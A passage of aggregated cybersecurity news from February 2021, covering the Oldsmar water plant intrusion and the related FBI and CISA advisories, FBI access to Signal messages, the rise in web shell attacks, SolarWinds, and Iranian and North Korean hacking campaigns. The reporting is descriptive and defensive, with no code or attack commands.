If using personal passwords, utilize complex rotating passwords of varying lengths. Note:TeamViewer allows users to change connection passwords for each new session. If an enduser chooses this option, never save connection passwords as an option as they can beleveraged for persistence
The FBI alert also warns of the risk of using Windows 7 operating system that has reached end-of-life on January 14, 2020.
“Continued use of Windows 7 increases the risk of cyber actorexploitation of a computer system” continues the alert. “Cyber actors continue to find entry points into legacy Windows operating systems and leverageRemote Desktop Protocol (RDP) exploits.”
The alert warns of cyber actors often using misconfigured or improperly secured RDP access controls to conduct cyber-attacks.
Below the general general recommendations provided by the FBI:
Update to the latest version of the operating system (e.g. Windows 10).
Use multiple-factor authentication.
Use strong passwords to protect Remote Desktop Protocol (RDP) credentials.
Ensure anti-virus, spam filters, and firewalls are up to date, properly configured and secure.
Audit network configurations and isolate computer systems that cannot be updated.
Audit your network for systems using RDP, closing unused RDP ports, applying multiple-factorauthentication wherever possible, and logging RDP login attempts.
Audit logs for all remote connection protocols.
Train users to identify and report attempts at social engineering.
Identify and suspend access of users exhibiting unusual activity
Court documents show FBI could use a tool to access private Signal messages on iPhones
14.2.2021 BigBrothers Securityaffairs
Court documents obtained by Forbes revealed that the FBI may have a tool that allows accessing private Signal messages on iPhones.
Court documents related to a recent gun-trafficking case in New York and obtained by Forbes revealed that the FBI may have a tool to access private Signal messages.
The documents revealed that encrypted messages can be intercepted from iPhone devices when they are in “partial AFU (after first unlock)” mode.
“The clues came via Seamus Hughes at the Program on Extremism at the George Washington University in court documents containing screenshots of Signal messages between men accused, in 2020, of running a gun trafficking operation in New York.” states Forbes. “There’s also some metadata in the screenshots, which indicates not only that Signal had been decrypted on the phone, but that the extraction was done in “partial AFU.” That latter acronym stands for “after first unlock” and describes an iPhone in a certain state: an iPhone that is locked but that has been unlocked once and not turned off.”
Some forensics security firms. such as Cellebrite and Grayshift/GrayKey, developed platforms for the forensic investigation of mobile devices that allow extraction of sensitive information. In December, the Israeli security firm Cellebrite claimed that it can decrypt messages from the Signal highly secure messaging app.
The tools exploit both software and hardware vulnerabilities to extract data from mobile devices.
Investigators could extract data from iPhone devices in partial AFU mode because encryption keys are stored in memory and could be accessed using specific forensic tools.
At the time of this writing, it is unclear which model of iPhone was accessed by the FBI either the iOS version running on the device.
“The iPhone in question appears to be either an iPhone 11 (whether Pro or Max) or a second generation iPhone SE. It’s unclear if the police can access private data on an iPhone 12. It’s also not clear what software version was on the device. Newer iOS models may have better security.” continues Forbes. “Apple declined to comment, but pointed Forbes to its response to previous research regarding searches of iPhones in AFU mode, in which it noted they required physical access and were costly to do.”
A Signal spokesperson told Forbes that if someone is in physical possession of a device can exploit an unpatched Apple or Google operating system vulnerability to partially or fully bypass the lock screen, and then interact with the device.
Microsoft warns of the rise of web shell attacks
13.2.2021 BigBrothers Securityaffairs
Researchers from Microsoft are warning that the number of monthly web shell attacks has doubled since last year.
Microsoft reported that the number of monthly web shell attacks has almost doubled since last year, its experts observed an average of 140,000 of these software installs on servers on a monthly basis, while in 2020 they were 77,000.
“One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we saw last year.” reads the report published by Microsoft.
A web shell is a code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.
The surge in the number of attacks involving web shells is attributed to their simplicity and efficiency.
The latest Microsoft 365 Defender data shows a growing trend since August 2020.
web shell attacks encounters-trend
Microsoft also provided some tips on how to harden servers against attacks attempting to download and install a web shell.
The experts highlighted challenges in detecting web shell attacks, these malicious codes can be developed using several languages. They are difficult to detect due to their simplicity, threat actors often used webshells for persistence or for early stages of exploitation.
Web shells can be hidden web shells in non-executable file formats, such as media files.
“Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server.” continues the report. “When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.”
In April 2020, the U.S. NSA and the Australian Signals Directorate (ASD) issued a report to warn of attackers increasingly exploiting vulnerable web servers to deploy web shells.
The document provides valuable information on how to detect and prevent web shells from infecting the servers of the Department of Defense and other government agencies. The report could be useful for administrators that want to defend the servers in their networks from these threats.
The NSA has also released in its GitHub repository a collection of tools that can be used to prevent the deployment of the webshells and detect/block these threats.
U.S. Gov Warning on Water Supply Hack: Get Rid of Windows 7
13.2.2021 BigBrothers Securityweek
On the heels of last week’s lye-poisoning attack against a small water plant in Florida, the U.S. government’s cybersecurity agency is pleading with critical infrastructure defenders to rip-and-replace Windows 7 from their networks as a matter of urgency.
The government’s latest appeal, issued via a joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), comes amidst reports that the remote hack of the water plant near Tampa Bay was being blamed on poor password hygiene and attacks on systems running Microsoft’s out-of-service Windows 7 operating system. In addition to running Windows 7 on computers at the plant, all devices used the same password for remote access.
Microsoft ended support for Windows 7 more than a year ago but, as cybersecurity experts warn on a nonstop basis, the plants and factories that run critical infrastructure are very slow to migrate to newer operating systems.
This means that unless organizations purchase an Extended Security Update (ESU) plan from Microsoft, security patches for remote, code-execution vulnerabilities will remain unpatched. The ESU is a per-device plan available for Windows 7 Professional and Enterprise versions, with an increasing price the longer a customer continues use.
More ominously, Microsoft will only offer the ESU plan until January 2023, meaning that any tardy organization lagging with OS migration plans will be sitting duck for dangerous hacker attacks.
“Continued use of Windows 7 increases the risk of cyber actor exploitation of a computer system. Cyber actors continue to find entry points into legacy Windows operating systems and leverage Remote Desktop Protocol (RDP) exploits,” the agency warned. “Since the end of July 2019, malicious RDP activity has increased with the development of a working commercial exploit for the vulnerability. Cyber actors often use misconfigured or improperly secured RDP access controls to conduct cyberattacks.”
In its bulletin, the agency all but confirmed public reports that the TeamViewer software was used to gain unauthorized access to the system. “The cyber actors likely accessed the system by exploiting cybersecurity weaknesses, including poor password security, and an outdated operating system,” the agency said, repeating urgent warnings that these present a perfect playbook and roadmap into sensitive networks.
As SecurityWeek previously reported, the hack was spotted on February 5th -- and neutralized -- in real time by staff at the plant that supplies water to Oldsmar, a small city close to Tampa, Florida.
Local law enforcement officials said an unknown adversary hacked into the plant remotely and attempted to elevate levels of levels of sodium hydroxide by a factor of more than 100.
Sodium hydroxide, also known as lye, controls the acidity in potable water but elevated levels maliciously added to water supply can cause physical harm to the public.
The joint-advisory contains specific mitigation recommendations to harden ICS/SCADA networks across the country. These include:
• Update to the latest version of the operating system (e.g. Windows 10).
• Use multiple-factor authentication.
• Use strong passwords to protect Remote Desktop Protocol (RDP) credentials.
• Ensure anti-virus, spam filters, and firewalls are up to date, properly configured and secure.
• Audit network configurations and isolate computer systems that cannot be updated.
• Audit your network for systems using RDP, closing unused RDP ports, applying multiple-factor authentication wherever possible, and logging RDP login attempts.
• Audit logs for all remote connection protocols.
• Train users to identify and report attempts at social engineering.
• Identify and suspend access of users exhibiting unusual activity.
In addition to ditching Windows 7, the agency urged network defenders to lock down TeamViewer desktop-sharing software and ensure proper password hygiene and rules are employed.
Industry Reactions to U.S. Water Plant Hack: Feedback Friday
13.2.2021 BigBrothers Securityweek
Experts provide insights on recent hack impacting water facility in FloridaThe U.S. government revealed this week that unknown hackers had managed to remotely access systems at a Florida city’s water plant and attempted to elevate levels of a certain chemical to a point where it would put the public at risk of being poisoned.
The attack, which targeted the water supply in Oldsmar, a small city in Florida, was discovered by staff at the plant — they noticed the mouse moving on the screen — and they rushed to take action before any damage was caused.
The attackers breached the facility via TeamViewer, which staff had been using to monitor systems remotely and respond to issues related to the water treatment process. The computers at the plant were running Windows 7 and all devices used the same password for remote access. Computers were remotely accessible from the internet and were not protected with firewalls, making it easier for the hackers to gain access.
Industry reactions to US water plant hack
Industry professionals have commented on various aspects of the breach, including implications and the measures organizations should take to prevent such incidents.
Daniel Kapellmann Zafra, Manager of Analysis, Mandiant Threat Intelligence:
“Since last year, Mandiant Threat Intelligence has observed an increase in cyber incidents perpetrated by low sophisticated actors seeking to access and learn about remotely accessible industrial systems. Many of the victims appear to have been selected arbitrarily, such as small critical infrastructure asset owners and operators who serve a limited population set. Through remote interaction with these systems, actors have engaged in limited-impact operations that often included manipulation of variables from physical processes. None of these cases has resulted in damage to people or infrastructure given that industrial processes are often designed and monitored by professional engineers who incorporate safety mechanisms to prevent unexpected modifications. We believe that the increasing interest of low sophisticated actors in industrial control systems is the result of the increased availability of tools and resources that allow malicious actors to learn about and interact with these systems.
While the incident does not appear to be particularly complex, it highlights the need to strengthen the cybersecurity capabilities across the water and wastewater industry similarly to other critical infrastructure sectors.”
Joe Slowik, Senior Security Researcher, Domain Tools:
“[The Stuxnet, Triton, Industroyer and the 2015 Ukraine power grid attacks emphasized] a critical barrier to adversary success: the ability to evade, influence, or outright deny operator visibility into and control over ICS environments. In all four examples, the attacks required some mechanism to hide from operators or deny their ability to correct or mitigate changes made to operating parameters.
In the case of the Oldsmar treatment plant incident, the intruder failed to attempt any such action based on information currently available. Had the unknown entity spoofed or otherwise interfered with HMI display parameters or sensor data, the operator on duty would be less likely to notice the incident as it took place, resulting in an attack moving on to engineering and process controls for potential mitigation or detection. Not only did the intruder fail to limit or manipulate process view in the environment, they executed the event during primary working hours on a weekday, almost ensuring that such activity would be quickly noticed (and mitigated).
Based on these observations and in light of past ICS incidents, we can therefore make a reasonably confident claim with available evidence that this was not an especially complex or savvy “attack”. As described in multiple sources, the intruder appears to have merely taken advantage of weakly secured, accessible remote access mechanisms to connect to plant equipment controls, followed by either deliberate or potentially inadvertent manipulation of the environment. That such an attempt occurred at all is certainly concerning, but the overwhelming evidence given event timing and execution indicate that there were only slight possibilities for this event to produce significant damage or harm.”
Ron Brash, Director of Cyber Security Insights, Verve Industrial:
“This will be a very interesting trial for any individuals caught, but it’s likely those who were managing this facility were struggling too &/or potentially negligent as they may have been aware that additional cybersecurity was needed given the importance of this infrastructure. I suspect insurance due diligence would have been problematic had a disaster occurred; it might even be revoked now…
This was not the first attack on water or utilities, and lucky there was a human in the loop to prevent disaster. The warning bell should be sounded, but CISOs (or those in charge) are lucky because they are in a very defensible position. In fact, I believe this is a call for organization’s to double down on the cybersecurity basics, assess their asset & infrastructure, and validate controls on their “crown” jewels. There are effective and feasible strategies out there to help municipalities get control of an out of control situation that will slowly gain speed.
Whether the government should step in and help, or by what means is debatable. Municipalities need help, but they also need ongoing support & commitment – not a one time grant that probably will be without a follow up.
Digitalization of water and utilities presents a problem we are seeing more and more often. New connected systems are being added, and this magnifies/multiplies the risks that may not have been applicable before. Security always degrades, and remote connectivity or any new technology.”
Grant Geyer, Chief Product Officer, Claroty:
“Water and wastewater is one of the most at-risk critical infrastructure sectors today. Industrial control system (ICS) vulnerability disclosures impacting the sector have increased significantly year-over-year. As noted in our Biannual ICS Risk & Vulnerability Report released a few days ago, the Claroty Research Team found that ICS vulnerabilities disclosed during the second half (2H) of 2020 increased by 54% from 2H 2019 and 63% from 2H 2018 in water and wastewater.
Due to the long depreciation period of equipment in critical infrastructure environments, technology obsolescence and the security accompanying security vulnerabilities is a common occurrence. Additionally, many water utilities are small entities and are under-resourced, making the challenge of developing a robust security program that much more challenging.
The solution is not as simple as eliminating remote access to such high-stakes environments. The nature of our increasingly digitized world, especially with the shift to remote work caused by the pandemic, makes remote access a requirement – even in critical infrastructure. This isn’t a “should we or shouldn’t we” discussion – it’s coming at us. The key is how remote access can be implemented securely, so that we can stop these attacks – which will inevitably continue to happen – before the damage is done.”
Andrea Carcano, Co-Founder, Nozomi Networks:
“Based on the information available at this moment, this attack seems to lack any sophistication that could trigger more profound reactions. The fact that the perpetrator didn’t conceal his visual presence to the personnel monitoring the water treatment operation is the first signal that suggests the relatively low complexity of the attack. Furthermore, according to the reports of the incident, the attacker increased the levels of sodium hydroxide by a significant amount, typically monitored by automated systems, which likely suggests that the threat actor didn’t possess a specific background knowledge of the water treatment process.
Nevertheless, this incident is important because it reflects the status of too many industrial control system (ICS) installations, especially those with smaller budgets and a smaller size, where security is often overlooked. Remote access, in particular, when not designed with security in mind, is often the beachhead used by remote attackers to infiltrate an ICS network. In this very case, the water treatment plant of Oldsmar has been using a Teamviewer instance, which apparently was accessible from the Internet. While it is not known at this stage how the attackers obtained the credentials required, this incident, like many that we’ve documented in recent years, didn’t seem to rely on sophisticated zero day exploit for its execution.”
Chris Grove, Technology Evangelist, Nozomi Networks:
“As evidenced in this cyber attack, typical cyber security activities may not have mitigated this risk, including vulnerability management, network segmentation, system hardening, identity and access management, firewalling, etc. In many cases, and especially during this pandemic, remote administration solutions have been thrown into the mix, sometimes haphazardly. In some cases the due diligence and compensating security controls haven’t been recognized. In other cases it has. Either way, facilities should stop thinking like they will prevent cyber attacks and start thinking like they’re already happening. They may not see it, so they should be in a constant state of recovery.
That said, concepts such as zero trust start making sense. Once the operator realizes that nothing is to be trusted, they move towards monitoring the process itself, and the parameters being sent from all of the devices in the control room to the equipment. If the water facility in Oldsmar had this level of cyber security, alarms would have gone off the moment the values were set to anomalous numbers.
[...]
Unfortunately most of today’s facilities are only protected a little bit by wide monitoring which doesn’t go deep into the industrial control protocols themselves. Any facility where human lives are at risk, particularly so many, should monitor the industrial control process using artificial intelligence and anomaly detection to monitor, alert and stop anomalies within the process that aren’t a part of regular operations. By doing so, the facility would mitigate many risks including malicious or negligent insiders that may accidentally type a few digits too many, as well as external attackers looking to pull off an act of terrorism.”
Austin Berglas, former head of FBI NY Cyber and Global Head of Professional Services at BlueVoyant:
“Along with energy production and manufacturing, water supply facilities are part of the United State’s critical infrastructure and have long been targets for cyber attack from both criminal and state sponsored entities. Water facilities rely on systems control and data acquisition (SCADA) systems to manage the automated process or water distribution and treatment. Many of these industrial control systems (ICS) are outdated, unpatched, and available for review on the Internet, leaving them incredibly vulnerable to compromise. In addition, many ICS solutions were designed for non-internet facing environments and therefore did not incorporate certain basic security controls - this offers additional vulnerabilities as more and more operational technology environments are allowing access to their ICS systems from the Internet.
In 2013, the FBI investigated a compromise of the Bowman Avenue Dam in Rye Brook NY and found that members of the Iranian Revolutionary Guard had gained access through Internet facing controls. Although the Dam was not functioning at the time and was most likely not the Iranian’s main target, it demonstrates the vulnerability of certain critical infrastructure when their ICS systems are allowed to be exposed to the Internet and not isolated.”
Saryu Nayyar, CEO, Gurucul:
“The cyberattack against the water supply in Oldsmar, Florida, last week should come as a wakeup call. Cybersecurity professionals have been talking about infrastructure vulnerabilities for years, detailing the potential for attacks like this, and this is a near perfect example of what we have been warning about. Though this attack was not successful, there is little doubt a skilled attacker could execute a similar infrastructure attack with more destructive results. Organizations tasked with operating and protecting critical public infrastructure must assume the worst and take more serious measures to protect their environments.”
Chloé Messdaghi, VP of Strategy, Point3 Security:
“The thing we need to understand is that you don’t have to be a highly skilled attacker to be able to successfully breach a system like this. Although alarms would’ve been triggered before any dangerous water reached anyone’s taps, this plant was very lucky that the worker noticed his mouse moving and was able to address it quickly. Water plants are not known for their security resources, and between budget cuts and COVID keeping people working remotely, they’re even more vulnerable. It’s becoming more and more easy to access systems like these by people who have hardly any experience at all.
The area this happened in has a high population of children, and it’s disturbing to think someone would attempt to do harm like this.”
Karl Sigler, Senior Security Research Manager, SpiderLabs at Trustwave:
"All systems used for critical networks like these should have very limited, if any, Internet access. User accounts and credentials used to authenticate locally on the workstation and for TeamViewer should be changed frequently and utilise multi-factor authentication. In this instance, it was lucky that the user was physically there to see the remote control and what settings had changed, but all critical activities should be audited, logged and monitored for abuse."
Report Highlights Cyber Risks to US Election Systems
13.2.2021 BigBrothers Securityweek
Election systems in the U.S. are vulnerable to cyber intrusions similar to the one that hit federal agencies and numerous businesses last year and remain a potential target for foreign hacking, according to a report released Wednesday.
The report by the Center for Internet Security, a nonprofit that partners with the federal government on election security initiatives, focuses on how hardware and software components can provide potential entryways for hackers.
“We have to continue to get better,” said Aaron Wilson, a co-author of the report. “We have to improve our defenses, as those that are on the other side are likely honing their attack strategy, as well.”
The 2020 election was deemed the “most secure” in history by a coalition of government cybersecurity experts and state and local election officials. There also is no indication that any election system was compromised as part of the hacking campaign that exploited an update of network management software from a company called SolarWinds. It was the largest cybersecurity breach of federal systems in U.S. history.
Despite that, election systems are vulnerable to the same risks exposed by the SolarWinds hack, the report said. It describes the risk of such an attack, in which hackers might infiltrate the hardware or software used in election equipment. Even if voting results aren’t affected, such an attack could lead to confusion and undermine confidence in U.S. elections.
The nation’s decentralized system of election administration means voting technology varies from state to state and even county to county, providing multiple ways for malicious actors to gain access. The systems generally rely on components from third-party suppliers or use commercial, off-the-shelf hardware. Most also use proprietary software that may not be subjected to rigorous security testing.
“It’s a complex mix of parts and suppliers, which creates very real supply chain risks,” said Eddie Perez, global director of technology development at the OSET Institute, a nonprofit election technology research corporation.
The use of foreign suppliers for voting technology and related supply chain security has long been a concern. During a congressional hearing last year, executives with the three major voting machine vendors faced repeated questioning from lawmakers about the sources of the parts used to manufacture their voting machines, what steps they have taken to secure their products from tampering and what, if anything, can be done to use American-made parts.
The executives said the machines they manufacture include, to some extent, components from China but said using foreign suppliers isn’t unique to the voting equipment industry.
SolarWinds, a Texas company, was breached by suspected Russian hackers to deliver malware and gain access to networks of businesses and governments, including the U.S. departments of Commerce, Treasury and Justice as part of a large-scale cyberespionage campaign.
Brandon Wales, the acting director of the U.S. Cybersecurity and Infrastructure Security Agency, said recently there was “no evidence that any election systems were compromised” as part of the hack.
Election officials have spent years working to boost their cybersecurity defenses after it became clear in late 2017 that Russian hackers had scanned state and local voter registration systems in the run-up to the 2016 election — and penetrated a few. Tens of millions of dollars have been spent to educate and train state and local election officials, add security defenses such as firewalls, and conduct security reviews and testing.
Also Wednesday, the U.S. Election Assistance Commission approved the first update in 15 years to a series of voluntary guidelines used by most states to certify voting machines. The guidelines include several security improvements, including a recommendation for states to adopt a strategy to reduce supply chain risks.
Biden Team Asks Court to Pause Move to Ban TikTok in US
11.2.2021 BigBrothers Securityweek
President Joe Biden's administration has asked a US federal court to pause proceedings aimed at banning TikTok to allow for a fresh review of the national security threat from the popular Chinese-owned video app.
The filing in a federal appeals court said the new administration had begun a review and would not for the moment press for a ban of the mobile app as sought by former president Donald Trump.
The filing said the Commerce Department "plans to conduct an evaluation of the underlying record justifying those prohibitions" sought by the previous administration of Donald Trump, which claimed TikTok posed a national security threat because of its links to the Chinese government.
After the new review, the administration "will then be better positioned to determine whether the national security threat" from TikTok.
"The Department of Commerce remains committed to a robust defense of national security as well as ensuring the viability of our economy and preserving individual rights and data privacy," the filing said.
The Trump administration move to ban downloads of TikTok and its presence on online networks had been stalled amid legal challenges.
In a related development, the Wall Street Journal reported the Biden administration has also put on hold a plan to force the sale of TikTok to American investors.
The Journal, citing unnamed sources, said the Biden White House had indefinitely shelved the plan to require the sale of TikTok, owned by China's ByteDance, to US tech giant Oracle with Walmart as a partner.
The Journal said the new administration is in the midst of a review of data security and ways to prevent the information TikTok collects on American users from being accessed by the Chinese government, but that there would be no imminent move to force the sale.
The White House did not directly address the report, but spokeswoman Jen Psaki said: "It's not accurate to suggest that there is a new proactive step by the Biden White House."
Psaki added that there is a "rigorous" review of data security of TikTok by an interagency government panel, with no timetable set.
"I will note broadly speaking that we are comprehensively evaluating the risks... to US data including from TikTok and will address them in a decisive and effective fashion," she said.
TikTok, the wildly popular app with an estimated 100 million US users, has repeatedly defended itself against allegations of data transfers to the Chinese government, saying it stores user information on servers in the United States and Singapore.
A tentative deal unveiled by the Trump administration would make Silicon Valley giant Oracle the technology partner for TikTok and a stakeholder in a new entity to be known as TikTok Global.
White House Names SolarWinds Response Leader Amid Criticism
11.2.2021 BigBrothers Securityweek
After members of Congress criticized as “disorganized” the U.S. response to a massive breach of government departments and private corporations discovered late last year, the White House announced Wednesday that a senior national security official had been leading the effort since the first day of the Biden administration.
Anne Neuberger, the deputy national security adviser for cyber and emergency technology, was in charge of remediating the hack, identifying issues with the federal government’s response and launching a study aimed at preventing similar incidents, the White House said.
Intelligence and law enforcement officials are still trying to piece together the cyberespionage campaign blamed on Russia that has badly shaken the U.S. government and private sector. The hack, connected to tainted software from the U.S. firm SolarWinds, was publicly revealed in December but believed to have begun more than a year earlier.
The intruders stealthily scooped up intelligence for months, carefully choosing targets from thousands of customers infected with malicious code they activated after sneaking it into an update of network management software first pushed out last March by Texas-based SolarWinds. The company makes popular software that monitors computer networks of businesses and governments.
So far, the list of agencies known to have been affected includes the Treasury, Commerce and Justice departments, along with several private companies including cybersecurity firms. The Russian government has denied any role in the hack.
In a letter released Tuesday, leaders of the Senate Intelligence Committee blasted the Biden administration for what they said was a lackluster reaction to the SolarWinds hack.
“The briefings we have received convey a disjointed and disorganized response to confronting the breach,” Sens. Mark Warner, D-Va., and Marco Rubio, R-Fla., said in the letter.
Warner, the new Democratic chairman of the committee, and Rubio, the Republican vice chairman, urged the Biden administration to “name and empower a clear leader” who has the authority to “coordinate the response, set priorities, and direct resources to where they are needed.”
The White House response on Wednesday pointed to Neuberger’s role since Biden’s inauguration. The response to the letter was first reported by The New York Times.
“In the first weeks of the Biden administration DNSA Neuberger has held a series of consultations with both Democratic and Republican members of Congress on our approach to SolarWinds specifically and our cybersecurity strategy broadly,” said Emily Horne, a spokeswoman for the National Security Council. “We look forward to continuing to work with Congress on these issues.”
A joint statement from Warner and Rubio acknowledged the White House’s reassurance and suggested Neuberger’s role had not been known.
“The federal government’s response to date to the SolarWinds breach has lacked the leadership and coordination warranted by a significant cyber event, so it is welcome news that the Biden administration has selected Anne Neuberger to lead the response,” the statement said.
Also on Wednesday, the House Homeland Security Committee held a hearing with cybersecurity experts to discuss the SolarWinds hack and other issues.
“In the not too distant past ... most of us had never heard of SolarWinds, but now it dominates cybersecurity conversations,” said Rep. Bennie Thompson, D-Miss., the committee’s chairman.
Poor Password Security Led to Recent Water Treatment Facility Hack
11.2.2021 BigBrothers Thehackernews
New details have emerged about the remote computer intrusion at a Florida water treatment facility last Friday, highlighting a lack of adequate security measures needed to bulletproof critical infrastructure environments.
The breach involved an unsuccessful attempt on the part of an adversary to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant. The system's plant operator, who spotted the intrusion, quickly took steps to reverse the command, leading to minimal impact.
Now, according to an advisory published on Wednesday by the state of Massachusetts, unidentified cyber actors accessed the supervisory control and data acquisition (SCADA) system via TeamViewer software installed on one of the plant's several computers that were connected to the control system.
Not only were these computers running 32-bit versions of the Windows 7 operating system, but the machines also shared the same password for remote access and are said to have been exposed directly to the Internet without any firewall protection installed.
It's worth noting that Microsoft Windows 7 reached end-of-life as of last year, on January 14, 2020.
Adding to the woes, more often than not, many small public utilities are saddled with aging infrastructure, and the IT departments tend to be under-resourced, lacking in budget and expertise to upgrade their security posture and address vulnerabilities in a timely fashion.
"Restrict all remote connections to SCADA systems, specifically those that allow physical control and manipulation of devices within the SCADA network," Massachusetts state officials said. "One-way unidirectional monitoring devices are recommended to monitor SCADA systems remotely."
"Keep computers, devices, and applications, including SCADA/industrial control systems (ICS) software, patched and up-to-date," the alert cautioned, adding "use two-factor authentication with strong passwords."
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in a separate alert published today, warned of "cybercriminals targeting and exploiting desktop sharing software and computer networks running operating systems with end of life status to gain unauthorized access to systems."
The agency, besides recommending protective measures such as installing independent cyber-physical safety systems, also issued additional guidance when using TeamViewer, urging organizations to configure the service to "manual start" and refrain from using unattended access features.
Iranian Hackers Utilize ScreenConnect to Spy On UAE, Kuwait Government Agencies
11.2.2021 BigBrothers Thehackernews
UAE and Kuwait government agencies are targets of a new cyberespionage campaign potentially carried out by Iranian threat actors, according to new research.
Attributing the operation to be the work of Static Kitten (aka MERCURY or MuddyWater), Anomali said the "objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties," with malware samples and URLs masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait and the UAE National Council.
Since its origins in 2017, MuddyWater has been tied to a number of attacks primarily against Middle Eastern nations, actively exploiting Zerologon vulnerability in real-world attack campaigns to strike prominent Israeli organizations with malicious payloads.
The state-sponsored hacking group is believed to be working at the behest of Iran's Islamic Republic Guard Corps, the country's primary intelligence and military service.
Anomali said it spotted two separate lure ZIP files hosted on Onehub that claimed to contain a report on relations between Arab countries and Israel or a file relating to scholarships.
"The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes," the researchers noted, adding "Static Kitten is continuing to use Onehub to host a file containing ScreenConnect."
The attack commences by directing users to a downloader URL pointing to these ZIP files via a phishing email that, when opened, launches the installation process for ScreenConnect, and subsequently uses it to communicate with the adversary. The URLs themselves are distributed through decoy documents embedded in the emails.
ConnectWise Control (formerly called ScreenConnect) is a self-hosted remote desktop software application with support for unattended access and conducting meetings with screen-sharing features.
The ultimate goal of the attackers, it appears, is to use the software to connect to endpoints on client networks, enabling them to conduct further lateral movements and execute arbitrary commands in target environments in a bid to facilitate data theft.
"Utilizing legitimate software for malicious purposes can be an effective way for threat actors to obfuscate their operations," the researchers concluded. "In this latest example, Static Kitten is very likely using features of ScreenConnect to steal sensitive information or download malware for additional cyber operations."
Old Iranian Spying Operation Resumes After Long Break
10.2.2021 BigBrothers Securityweek
Following a two-year downtime, an Iran-linked cyberespionage operation has recommenced with new second-stage malware and with an updated variant of the Infy malware, according to joint research conducted by cybersecurity firms SafeBreach and Check Point.
Evidence suggests the operation started as early as 2007 -- it was one of the earliest Iranian campaigns discovered -- but it was initially detailed in 2016, while the next year it also involved the use of a piece of malware called Foudre, which by 2018 had already been updated eight times.
Following a quiet period, the operation recommenced during the first half of 2020, with new versions of Foudre (versions 20-22) and new lure documents that were designed to execute the malicious code when closed. Once executed, Foudre connects to the command and control (C&C) server and fetches a new piece of malware, called Tonnerre.
The new malware, security researchers say, appears to have been designed to expand the capabilities of Foudre, but released as a separate component, most probably to be deployed only when needed.
Tonnerre, which camouflages itself as legitimate software, can steal files from the infected machines, can execute commands received from the C&C server, record sound, and capture screenshots.
The malware uses a DGA to connect to the C&C, which it then uses to store data about the victim, steal files, download updates, and get an additional C&C. Tonnerre uses both HTTP and FTP to communicate with the C&C server.
While investigating the operation, SafeBreach and Check Point identified two dozen victims, most located in Sweden (6), the Netherlands (4), Turkey (3), and the United States (3). Romania, Russia, India, Iraq, the United Kingdom, Germany, Canada, and Azerbaijan had one victim each, but Iran had none.
“It seems that following a long downtime, the Iranian cyber attackers were able to regroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and tooling capabilities,” reads a blog post that contains extensive technical details on both Foudre and Tonnerre.
Check Point last week reported that more than 1,200 Iranian citizens had been targeted in extensive cyber-surveillance operations backed by the Iranian government.
UN Experts: North Korea Using Cyber Attacks to Update Nukes
10.2.2021 BigBrothers Securityweek
North Korea has modernized its nuclear weapons and ballistic missiles by flaunting United Nations sanctions, using cyberattacks to help finance its programs and continuing to seek material and technology overseas for its arsenal, U.N. experts said.
The panel of experts monitoring sanctions on the Northeast Asian nation said in a report sent to Security Council members Monday that North Korea’s “total theft of virtual assets from 2019 to November 2020 is valued at approximately $316.4 million,” according to one unidentified country.
The panel said its investigations found that North Korean-linked cyber actors continued to conduct operations in 2020 against financial institutions and virtual currency exchange houses to generate money to support its weapons of mass destruction and ballistic missile programs.
In its weapons development, the experts said, Kim Jong Un’s government has also produced fissile material — an essential ingredient for producing nuclear weapons — and maintained its nuclear facilities.
“It displayed new short-range, medium-range, submarine-launched and intercontinental ballistic missile systems at military parades,“ they said. “It announced preparation for testing and production of new ballistic missile warheads and, development of tactical nuclear weapons ... and upgraded its ballistic missile infrastructure.“
The panel recommended that the Security Council impose sanctions on four North Korean men: Choe Song Chol, Im Song Sun, Pak Hwa Song, and Hwang Kil Su.
The Security Council has imposed increasingly tough sanctions on North Korea since its first test explosion of a nuclear device in 2006. It has banned most of the country’s exports and severely limited its imports, trying to pressure Pyongyang into abandoning its nuclear and ballistic missile programs.
But the report’s summary and some key findings and recommendations, obtained by The Associated Press, make clear that North Korea remains able to evade sanctions and develop its weapons and to illicitly import refined petroleum, access international banking channels and carry out “malicious cyber activities.”
North Korea’s arsenal escalated to a major threat to the United States following tests in 2017 that included a detonation of a purported thermonuclear warhead and flight tests demonstrating its ICBMs could reach deep in the American mainland.
A year later, Kim initiated diplomacy with South Korea and then-U.S. President Donald Trump that derailed in 2019 when the Americans rejected North Korea’s demands for major sanctions relief in exchange for a piecemeal deal partially surrendering its nuclear weapons capabilities.
Last year, North Korea’s already battered economy decayed further amid the COVID-19 pandemic, which led Kim to close the country’s borders. That severely limited the legal and illegal transfer of goods and movement of people, according to the experts.
At a North Korean political conference, Kim sharply criticized his government’s economic agencies for unspecified passiveness and “self-protecting tendencies,” the North’s state media reported Tuesday. His remarks follow a ruling party congress last month where he called for greater state control over the economy while also vowing to continue all-out efforts to boost his nuclear program, which North Korea sees as a deterrent to the U.S. and thus an assurance of the Kim dynasty’s continued existence.
With his diplomatic efforts stalemated, Kim must start all over again with President Joe Biden, who previously called him a “thug” and criticized Trump for summit spectacles instead of significant nuclear reductions.
In August 2019, the U.N. panel said North Korean cyber experts illegally obtained proceeds “estimated at up to $2 billion” to fund its weapons programs.
The panel said in the new report that it investigated “malicious” activities by the Reconnaissance General Bureau — North Korea’s primary intelligence agency, which is on the U.N. sanctions blacklist — including “the targeting of virtual assets and virtual asset service providers, and attacks on defense companies.”
North Korea continues to launder stolen cryptocurrencies especially through over-the-counter virtual asset brokers in China to acquire fiat currency which is government backed, like the U.S. dollar, the experts said.
